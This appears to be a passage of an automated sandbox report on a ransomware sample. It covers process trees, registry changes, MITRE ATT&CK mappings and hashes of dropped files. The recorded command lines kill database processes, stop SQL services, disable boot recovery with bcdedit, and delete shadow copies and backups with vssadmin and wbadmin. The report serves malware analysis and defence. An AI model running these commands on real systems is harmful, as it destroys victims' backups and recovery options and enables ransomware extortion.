PID 2996 wrote to memory of 2632	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 2632	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2632 wrote to memory of 2524	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2524	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2524	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2524	2632	cmd.exe	cmd.exe
PID 2996 wrote to memory of 2608	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 2608	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 2608	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 2608	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2608 wrote to memory of 2576	2608	cmd.exe	cmd.exe
PID 2608 wrote to memory of 2576	2608	cmd.exe	cmd.exe
PID 2608 wrote to memory of 2576	2608	cmd.exe	cmd.exe
PID 2608 wrote to memory of 2576	2608	cmd.exe	cmd.exe
PID 2576 wrote to memory of 2936	2576	cmd.exe	taskkill.exe
PID 2576 wrote to memory of 2936	2576	cmd.exe	taskkill.exe
PID 2576 wrote to memory of 2936	2576	cmd.exe	taskkill.exe
PID 2996 wrote to memory of 2584	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 2584	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 2584	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 2584	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2584 wrote to memory of 2656	2584	cmd.exe	cmd.exe
PID 2584 wrote to memory of 2656	2584	cmd.exe	cmd.exe
PID 2584 wrote to memory of 2656	2584	cmd.exe	cmd.exe
PID 2584 wrote to memory of 2656	2584	cmd.exe	cmd.exe
PID 2656 wrote to memory of 2400	2656	cmd.exe	taskkill.exe
PID 2656 wrote to memory of 2400	2656	cmd.exe	taskkill.exe
PID 2656 wrote to memory of 2400	2656	cmd.exe	taskkill.exe
PID 2996 wrote to memory of 2416	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 2416	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 2416	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 2416	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2416 wrote to memory of 2476	2416	cmd.exe	cmd.exe
PID 2416 wrote to memory of 2476	2416	cmd.exe	cmd.exe
PID 2416 wrote to memory of 2476	2416	cmd.exe	cmd.exe
PID 2416 wrote to memory of 2476	2416	cmd.exe	cmd.exe
PID 2476 wrote to memory of 1720	2476	cmd.exe	taskkill.exe
PID 2476 wrote to memory of 1720	2476	cmd.exe	taskkill.exe
PID 2476 wrote to memory of 1720	2476	cmd.exe	taskkill.exe
PID 2996 wrote to memory of 268	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 268	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 268	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 268	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 268 wrote to memory of 2700	268	cmd.exe	cmd.exe
PID 268 wrote to memory of 2700	268	cmd.exe	cmd.exe
PID 268 wrote to memory of 2700	268	cmd.exe	cmd.exe
PID 268 wrote to memory of 2700	268	cmd.exe	cmd.exe
PID 2700 wrote to memory of 2708	2700	cmd.exe	taskkill.exe
PID 2700 wrote to memory of 2708	2700	cmd.exe	taskkill.exe
PID 2700 wrote to memory of 2708	2700	cmd.exe	taskkill.exe
PID 2996 wrote to memory of 2720	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 2720	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 2720	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 2720	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2720 wrote to memory of 2748	2720	cmd.exe	cmd.exe
PID 2720 wrote to memory of 2748	2720	cmd.exe	cmd.exe
PID 2720 wrote to memory of 2748	2720	cmd.exe	cmd.exe
PID 2720 wrote to memory of 2748	2720	cmd.exe	cmd.exe
PID 2748 wrote to memory of 2744	2748	cmd.exe	taskkill.exe
PID 2748 wrote to memory of 2744	2748	cmd.exe	taskkill.exe
PID 2748 wrote to memory of 2744	2748	cmd.exe	taskkill.exe
PID 2996 wrote to memory of 920	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.execa4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1396
- C:\Users\Admin\AppData\Local\Temp\ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
  "C:\Users\Admin\AppData\Local\Temp\ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Adds Run key to start application
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:2996
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
      4⤵
      PID:2524
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2576
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlbrowser.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2936
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2584
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2656
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sql writer.exe
        5⤵
        Kills process with taskkill
        
        PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2476
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlserv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1720
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2700
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msmdsrv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2708
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2748
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im MsDtsSrvr.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
    3⤵
    PID:920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
      4⤵
      PID:2012
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlceip.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2000
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
    3⤵
    PID:1968
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      4⤵
      PID:848
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdlauncher.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2160
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
    3⤵
    PID:1920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
      4⤵
      PID:2764
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im Ssms.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2320
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
    3⤵
    PID:684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      4⤵
      PID:560
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im SQLAGENT.EXE
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1012
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
    3⤵
    PID:1676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      4⤵
      PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
    3⤵
    PID:1660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      4⤵
      PID:1512
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im ReportingServicesService.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
    3⤵
    PID:2288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      4⤵
      PID:1716
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msftesql.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2252
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
    3⤵
    PID:2324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      4⤵
      PID:2248
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im pg_ctl.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
    3⤵
    PID:2276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
      4⤵
      PID:2804
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
    3⤵
    PID:552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      4⤵
      PID:2816
    - - C:\Windows\system32\net.exe
        
        net stop MSSQLServerADHelper100
        5⤵
        
        PID:396
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper100
        6⤵
        
        PID:2144
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
    3⤵
    PID:2140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
      4⤵
      PID:1292
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
    3⤵
    PID:1820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
      4⤵
      PID:1624
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$MSFW
        5⤵
        
        PID:2948
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$MSFW
        6⤵
        
        PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
    3⤵
    PID:1532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      4⤵
      PID:1136
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$ISARS
        5⤵
        
        PID:1228
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$ISARS
        6⤵
        
        PID:652
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
    3⤵
    PID:2488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      4⤵
      PID:1636
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$MSFW
        5⤵
        
        PID:1604
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$MSFW
        6⤵
        
        PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
    3⤵
    PID:888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
      4⤵
      PID:944
    - - C:\Windows\system32\net.exe
        
        net stop SQLBrowser
        5⤵
        
        PID:1440
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser
        6⤵
        
        PID:1488
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
    3⤵
    PID:2232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
      4⤵
      PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
    3⤵
    PID:1756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
      4⤵
      PID:2360
    - - C:\Windows\system32\net.exe
        
        net stop SQLWriter
        5⤵
        
        PID:1892
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter
        6⤵
        
        PID:852
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:1680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      PID:2784
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2572
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
    3⤵
    PID:872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
      4⤵
      PID:2108
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} recoverynabled No
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2660
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
    3⤵
    PID:2072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      4⤵
      PID:1552
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe SHADOWCOPY /nointeractive
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2444
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    PID:2028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
      4⤵
      PID:2772
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin DELETE SYSTEMSTATEBACKUP
        5⤵
        Deletes System State backups
        
        PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    PID:2172
- C:\Users\Admin\AppData\Local\Temp\ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
  \\?\C:\Users\Admin\AppData\Local\Temp\ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe -network
  2⤵
  - Adds Run key to start application
  - System policy modification
  PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c pause
    3⤵
    PID:2704

C:\Windows\system32\taskkill.exe
taskkill -f -im fdhost.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\system32\taskkill.exe
taskkill -f -impostgres.exe
1⤵
- Kills process with taskkill
PID:3036

C:\Windows\system32\net.exe
net stop MSSQL$ISARS
1⤵
PID:2308
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop MSSQL$ISARS
  2⤵
  PID:1816

C:\Windows\system32\net.exe
net stop REportServer$ISARS
1⤵
PID:2220
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop REportServer$ISARS
  2⤵
  PID:2268

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
1⤵
PID:2016
- C:\Windows\system32\wbadmin.exe
  wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
  2⤵
  - Drops file in Windows directory
  PID:2616

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
1⤵
PID:2228
- C:\Windows\system32\vssadmin.exe
  vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:2516

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
1⤵
PID:2168
- C:\Windows\system32\wbadmin.exe
  wbadmin delete backup -keepVersion:0 -quiet
  2⤵
  - Deletes system backups
  PID:1720

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\How_to_back_files.html

Filesize
5KB

MD5
1476d3f97ee42b0cb4eaf7a8313458e0

SHA1
0802384026418c0b503578d052bc7d990cb3263a

SHA256
19bab4fcf5a5d5109eb1c15e3fb4127ce8499fc71ad7d15951cbb5689a3f8645

SHA512
33a53c7a82b40f0f1e204f79eff4e1b04c60f05489931cd370ae6e0d0a7ba9656160f87f7ad020ee5a9c1272be966bc2cf1087ccae3db1bd1c6645df6ff5efc4

Download Submit
C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl

Filesize
7KB

MD5
fa72bbd1c0c3b014f936a9cf40962d4a

SHA1
f77495f95f6b122a3b0ba048e074c60a9c9f9b85

SHA256
4fceb7f9ec9f4c788741576d9826019d801a6b44af329ecae321b6e1536c2d4b

SHA512
79fda5a6b3ecb0c2663ed48de3e17c74808dd751bae2dd3724a42cafc7aec633032323be1b84e3b43b7b6a45f6790ed29cfe802fe77964de6589e3d0df70f556

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif

Filesize
1KB

MD5
9e00d867e40efb691fa13fbebb5c95dc

SHA1
cd971d35032b172eb326decd05dd89562baf6189

SHA256
3b93aaa4ccaef849b6f5eae1dd2b7629785d4d9d5217b9a7dcb766a274b52d28

SHA512
3ce3ab745c2ac05ac6d61588e7618cca501f738c88668eca79a9447a747fd13d30d6f9cfae8f1f5144362a34685033cdf3e78ec91d0af6bbdb6a5e3a809be67a

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC

Filesize
1KB

MD5
8d6043786f54b00e3753165ebb0d2961

SHA1
0d22f95f0d80a60db58648c27a89312efafa606b

SHA256
0b4892f542c8175ba7368d1875fd87773ea0a56089c9f63414b6f5af88abca76

SHA512
4c2b58cb12cca498a057b87ea3a8a8c615878d02972dbeb14771ba67bc695c6e5822e123bb6c650c00a228acd4476e7e984f4c6e39f4b5531637c1347e60a829

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5

Filesize
1KB

MD5
6523f6785672d90bd9073c8a9ee95c6b

SHA1
85b69cb5e5923ae35f0c97136790d3c347343f99

SHA256
8c0c3535fd8bc6f518093afefaeb86618ee6704324c96140e9e06116a6ea6c8e

SHA512
1f2531953b08621056b94897dd9811929454d5d6e675a25d9e4201cd42496f4dfc0c117ac82b47a64d8dd77c643131314202f65b49c26fefff25d423a409127f

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10

Filesize
1KB

MD5
e7b59b2166344ef55f362235cdb6bcee

SHA1
903abb6e02496a4b04a6432e53abefc8bd928e3a

SHA256
44c127911ae5e817272a656179b753233096971ac9f31e2adca125ae751dd990

SHA512
14d8bb0ab478eaf21db32d67b1e866806033b124e5699d8a85a54a7f325eaa6043e6f4439efa6e433ce95baad7ef91d9c20b3313918e2c94216650bf61d25bed

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7

Filesize
1KB

MD5
55710d9e150ae05bbfb330c6efed075f

SHA1
13f0c81abc4b256171633431eb50d631f3b4da12

SHA256
86d561eaf6aa39d1eefc69222848e6977cd9ff6bf25fb2e276a4487dc26707d6

SHA512
9550c4e79884758850753c8f12daf1f5bffaf3da2e3307d8fa2cda9e8842bf98d15db2a143761f7fe42312b8d505f1955491a3e3c7d62c26484ffbb83f0c920f

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html

Filesize
13KB

MD5
f45615241ba09d726e0b6d83342b6517

SHA1
be964772372a4dc56712f3c0851e5ece47d1fbfc

SHA256
671630785b585367577dfa8b3a92d49d723827f572aa5d4fae9fdcff309a80ab

SHA512
065033759406aeaa0d2a33f9cce4160245dc4fc9136a3fa383056b75ffee4a20404c15b953126c444546af1acc85556aaedac39d512464da8b44bf13f0074149

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html.protect143

Filesize
10KB

MD5
1eb52482de03f6543102861673a379f4

SHA1
3adf819ac891b672ea90658f175a4cb907ba8c6c

SHA256
a3d1d9f5125550b6d8ca602f7988c008cf01493b2d60c16ece4e90adafde5734

SHA512
1455027a088da46d68770b2278b070d156f1a5ca3f9fa5695c5a0e64e168c0cab3f41a31f80a83f611e1a5b9bfa8a82b1cf9d4738d343ac7f2448935ccd02112

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf

Filesize
1KB

MD5
3ea2d9646b03a4483721b8a1f13459eb

SHA1
8c939e9f06eee5feb7f4d88f60feabe355b4137b

SHA256
d1461add95977de60c383a6892c3786565ba05e7d728729c37cb7d9719602f9b

SHA512
bd478704a154a1714906bf14b50cf1e570e7e7a3309443f572ba0a0c6da06b0f438bca71d6a2b972066272b77c14b254b807daa6253efb60ebea9cab85ab3351

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA

Filesize
9KB

MD5
